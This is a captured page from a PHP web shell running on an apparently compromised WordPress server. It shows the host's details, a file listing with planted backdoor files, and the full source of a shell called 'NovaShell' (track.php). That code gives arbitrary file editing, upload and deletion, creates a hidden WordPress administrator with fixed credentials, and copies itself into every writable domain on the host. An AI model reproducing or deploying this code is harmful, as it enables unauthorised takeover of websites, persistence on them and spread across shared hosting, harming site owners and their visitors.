Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
8.1.33 Safe mode: OFF Datetime: 2025-12-14 10:04:31
2792.60 GB Free: 1880.57 GB (67%)
/home/kheruwym/public_html/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
202.131.4.21
Client IP:
216.73.216.89
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2025-11-28 13:13:32dr-xr-xr-xRename Touch
[ .. ]dir2025-12-11 23:22:37drwx--x--xRename Touch
[ .tmb ]dir2025-11-12 07:07:40drwxrwxrwxRename Touch
[ .well-known ]dir2025-11-12 07:07:35drwxr-xr-xRename Touch
[ 117cb ]dir2025-11-14 05:53:05dr-xr-xr-xRename Touch
[ 1d8b10 ]dir2025-11-14 08:28:52drwxr-xr-xRename Touch
[ cgi-bin ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ f4727b ]dir2025-11-19 07:48:55drwxr-xr-xRename Touch
[ images ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ wp-admin ]dir2025-11-26 03:07:13drwxr-xr-xRename Touch
[ wp-content ]dir2025-11-22 08:16:38drwxr-xr-xRename Touch
[ wp-includes ]dir2025-11-22 08:16:25drwxr-xr-xRename Touch
.htaccess1.13 KB2025-11-28 13:17:43-r-xr-xr-xRename Touch Edit Download
.htaccess.phpupgrader.574027731.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.9e97ffcf1.45 KB2023-08-02 18:50:37-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.initial1.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
click.php1.93 KB2023-09-14 08:16:25-r--r--r--Rename Touch Edit Download
defaults.php1.93 KB2023-07-21 03:50:14-r--r--r--Rename Touch Edit Download
ex.php5.96 KB2025-11-28 13:13:32-rw-r--r--Rename Touch Edit Download
header.php0 B2025-11-10 06:52:51-rw-r--r--Rename Touch Edit Download
index.php35.97 KB2023-05-29 08:16:38-r-xr-xr-xRename Touch Edit Download
index.php035.97 KB2023-09-11 08:16:37-rwxr-xr-xRename Touch Edit Download
item.php1.29 KB2023-08-18 08:15:39-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
mah.php1.93 KB2023-12-31 03:48:47-r--r--r--Rename Touch Edit Download
networks.php1.29 KB2024-01-13 03:43:18-r--r--r--Rename Touch Edit Download
options.php1.93 KB2023-12-03 08:16:25-r--r--r--Rename Touch Edit Download
pages.php1.44 KB2023-07-28 08:15:18-r--r--r--Rename Touch Edit Download
php.ini40 B2025-11-18 19:54:41-rw-r--r--Rename Touch Edit Download
plugins.php1.87 KB2023-07-01 08:16:25-r--r--r--Rename Touch Edit Download
product.php2.03 KB2023-04-16 03:50:14-r--r--r--Rename Touch Edit Download
quoys.php26.20 KB2025-11-13 01:08:41-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2025-09-30 22:02:04-rw-r--r--Rename Touch Edit Download
robots.txt364 B2023-06-15 08:16:38-r--r--r--Rename Touch Edit Download
search.php1.46 KB2023-12-19 08:16:38-r--r--r--Rename Touch Edit Download
track.php6.49 KB2025-11-12 04:05:52-rw-r--r--Rename Touch Edit Download
txets.php5.89 KB2025-11-12 06:13:57-rw-r--r--Rename Touch Edit Download
wp-activate.php7.21 KB2024-04-02 19:31:34-rw-r--r--Rename Touch Edit Download
wp-blog-header.php347 B2025-11-10 06:52:59-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2023-08-09 07:36:19-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
wp-config.php3.12 KB2022-02-15 07:01:10-rw-------Rename Touch Edit Download
wp-confiq.php0 B2025-11-10 06:52:50-rw-r--r--Rename Touch Edit Download
wp-cron.php5.51 KB2025-11-10 06:53:00-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-log1n.php1.72 KB2024-01-28 08:14:59-r--r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-settings.php29.38 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.98 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
xmlshell.php243.86 KB2025-11-13 16:26:34-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
User: kheruwym (1551)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/kheruwym/public_html/
Upload Files
File: /home/kheruwym/public_html/track.php
<?php
// 🛸 NovaShell — Clean PHP Shell with WP injector and replication
error_reporting(0);

// === Core Vars
$cwd = isset($_GET['p']) ? realpath($_GET['p']) : getcwd();
if (!$cwd || !is_dir($cwd)) $cwd = getcwd();

// === Delete file or dir
if (isset($_GET['del'])) {
    $t = realpath($_GET['del']);
    if (strpos($t, getcwd()) === 0 && file_exists($t)) {
        is_dir($t) ? rmdir($t) : unlink($t);
        echo "<p class='log red'>🗑️ Deleted: " . basename($t) . "</p>";
    }
}

// === WP Admin Creator
if (isset($_GET['wp'])) {
    $wppath = $cwd;
    while ($wppath !== '/') {
        if (file_exists("$wppath/wp-load.php")) break;
        $wppath = dirname($wppath);
    }
    if (file_exists("$wppath/wp-load.php")) {
        require_once("$wppath/wp-load.php");
        $user = 'nova'; $pass = 'Nova@2025'; $mail = 'nova@galaxy.com';
        if (!username_exists($user) && !email_exists($mail)) {
            $uid = wp_create_user($user, $pass, $mail);
            $wp_user = new WP_User($uid);
            $wp_user->set_role('administrator');
            echo "<p class='log green'>✅ WP Admin 'nova' created</p>";
        } else {
            echo "<p class='log yellow'>⚠️ User or email exists</p>";
        }
    } else {
        echo "<p class='log red'>❌ WP not found</p>";
    }
}

// === Clone Here Feature
if (isset($_GET['clone'])) {
    $target = "$cwd/track.php";
    $source = __FILE__;
    if (copy($source, $target)) {
        echo "<p class='log green'>🌀 Shell cloned to <code>track.php</code></p>";
    } else {
        echo "<p class='log red'>❌ Failed to clone shell</p>";
    }
}

// === Replication logic
function replicate($code) {
    static $once = false;
    if ($once) return [];
    $once = true;
    $start = __DIR__;
    while ($start !== '/') {
        if (preg_match('/\/u[\w]+$/', $start) && is_dir("$start/domains")) {
            $urls = [];
            foreach (scandir("$start/domains") as $dom) {
                if ($dom === '.' || $dom === '..') continue;
                $pub = "$start/domains/$dom/public_html";
                if (is_writable($pub)) {
                    $path = "$pub/track.php";
                    if (file_put_contents($path, $code)) {
                        $urls[] = "http://$dom/track.php";
                    }
                }
            }
            return $urls;
        }
        $start = dirname($start);
    }
    return [];
}

// === Breadcrumbs
function nav($p) {
    $out = "<div class='crumbs'>📂 Path: ";
    $parts = explode('/', trim($p, '/'));
    $build = '/';
    foreach ($parts as $seg) {
        $build .= "$seg/";
        $out .= "<a href='?p=" . urlencode($build) . "'>$seg</a>/";
    }
    return $out . "</div>";
}

// === Directory listing
function explorer($p) {
    $items = scandir($p);
    $dirs = $files = "";
    foreach ($items as $i) {
        if ($i == "." || $i == "..") continue;
        $full = "$p/$i";
        if (is_dir($full))
            $dirs .= "<li>📁 <a href='?p=" . urlencode($full) . "'>$i</a> <a class='red' href='?del=" . urlencode($full) . "' onclick='return confirm(\"Delete folder?\")'>[x]</a></li>";
        else
            $files .= "<li>📄 <a href='?p=" . urlencode($p) . "&v=" . urlencode($i) . "'>$i</a> 
                       <a class='edit' href='?p=" . urlencode($p) . "&e=" . urlencode($i) . "'>[✏]</a> 
                       <a class='red' href='?del=" . urlencode($full) . "' onclick='return confirm(\"Delete file?\")'>[x]</a></li>";
    }
    return "<ul>$dirs$files</ul>";
}

// === View or Edit
if (isset($_GET['v'])) {
    $f = basename($_GET['v']);
    echo "<h3>📄 Viewing: $f</h3><pre>" . htmlspecialchars(file_get_contents("$cwd/$f")) . "</pre><hr>";
}
if (isset($_GET['e'])) {
    $f = basename($_GET['e']);
    $path = "$cwd/$f";
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        file_put_contents($path, $_POST['data']);
        echo "<p class='log green'>✅ Saved</p>";
    }
    $src = htmlspecialchars(file_get_contents($path));
    echo "<h3>✏️ Edit: $f</h3>
        <form method='post'>
            <textarea name='data' rows='20'>$src</textarea><br>
            <button>💾 Save</button>
        </form><hr>";
}

// === Upload or mkdir
if ($_FILES) {
    move_uploaded_file($_FILES['upload']['tmp_name'], "$cwd/" . basename($_FILES['upload']['name']));
    echo "<p class='log green'>📤 Uploaded</p>";
}
if (!empty($_POST['mk'])) {
    $d = "$cwd/" . basename($_POST['mk']);
    if (!file_exists($d)) {
        mkdir($d);
        echo "<p class='log green'>📁 Created</p>";
    } else {
        echo "<p class='log yellow'>⚠️ Exists</p>";
    }
}

// === UI START
echo "<!DOCTYPE html><html><head><meta charset='utf-8'><title>🛸 NovaShell</title>
<style>
body { background:#000; color:#ddd; font-family:monospace; max-width:900px; margin:auto; padding:20px; }
a { color:#4cf; text-decoration:none; } a:hover { color:#8ff; }
ul { list-style:none; padding:0; }
textarea { width:100%; background:#111; color:#0f0; border:1px solid #333; }
button { background:#4cf; color:#000; padding:6px 12px; border:none; margin-top:5px; }
.red { color:#f44; }
.green { color:#4f4; }
.yellow { color:#ff4; }
.edit { color:#8cf; }
.crumbs { margin-bottom:10px; }
.log { padding:4px 0; }
</style></head><body>
<h2>🛸 NovaShell</h2>" . nav($cwd) . "<hr>";

// === WP Admin & Clone Buttons
echo "<form method='get' style='display:inline-block; margin-right:10px;'>
    <input type='hidden' name='p' value='" . htmlspecialchars($cwd) . "'>
    <button name='wp' value='1'>👤 Create WP Admin</button>
</form>";

echo "<form method='get' style='display:inline-block;'>
    <input type='hidden' name='p' value='" . htmlspecialchars($cwd) . "'>
    <button name='clone' value='1'>🌀 Clone Here</button>
</form><br><br>";

// === Replicate if original
if (basename(__FILE__) !== 'track.php') {
    $urls = replicate(file_get_contents(__FILE__));
    if (!empty($urls)) {
        echo "<p class='green'>✅ Cloned into:</p><ul>";
        foreach ($urls as $u) echo "<li><a href='$u' target='_blank'>$u</a></li>";
        echo "</ul><hr>";
    }
}

// === Upload & mkdir UI
echo "<form method='post' enctype='multipart/form-data'>
    <input type='file' name='upload'> <button>Upload</button></form><br>
<form method='post'>
    📁 <input type='text' name='mk'> <button>Create Folder</button></form><br>";

echo explorer($cwd);
echo "</body></html>";
?>
@ Telegram